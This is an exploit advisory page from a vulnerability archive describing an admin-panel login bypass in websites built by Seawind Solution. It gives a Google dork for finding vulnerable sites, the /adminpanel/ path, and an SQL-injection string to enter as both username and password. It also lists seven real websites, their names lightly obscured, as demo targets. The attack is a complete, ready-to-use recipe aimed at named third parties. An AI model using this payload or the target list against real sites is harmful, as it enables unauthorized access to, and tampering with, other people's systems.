Seawind Solution Bypass Admin Page Vulnerability

2015.07.26
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[#][#][#][#][#][#][#][#][#][#][#][#][#][#][#] [#] Exploit Title : Seawind Solution Bypass Admin Page Vulnerability [#] Exploit Author : Ashiyane Digital Security Team [#] Vendor Homepage : http://india.seawindsolution.com/ [#] Google Dork : intext:"Design & Developed By Seawind Solution Pvt.Ltd." [#] Date: 2015-07-24 [#] Tested On : Windows , Linux [#][#][#][#][#][#][#][#][#][#][#][#][#][#][#] [#] And then choose a target and put this after url : /adminpanel/ [#][#][#][#][#][#][#][#][#][#][#][#][#][#][#] [#] And fill username and password like the information below : [#] Username : '=' 'OR' [#] Password : '=' 'OR' [#][#][#][#][#][#][#][#][#][#][#][#][#][#][#] [#] Demos : [#] http://shalibXhadragroup.in/adminpanel/index.php [#] http://brightsXolar.in/adminpanel/index.php [#] http://totalcXontainerlines.com/adminpanel/index.php [#] http://crystXalgopal.com/adminpanel/index.php [#] http://harioXmengimech.com/adminpanel/index.php [#] http://bizzXnews.in/adminpanel/index.php [#] http://adXosolar.co.in/adminpanel/index.php [#][#][#][#][#][#][#][#][#][#][#][#][#][#][#] [#] SPT : All of the friends in my heart <3 [#] Discovered by : Cloner-47 [#][#][#][#][#][#][#][#][#][#][#][#][#][#][#]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top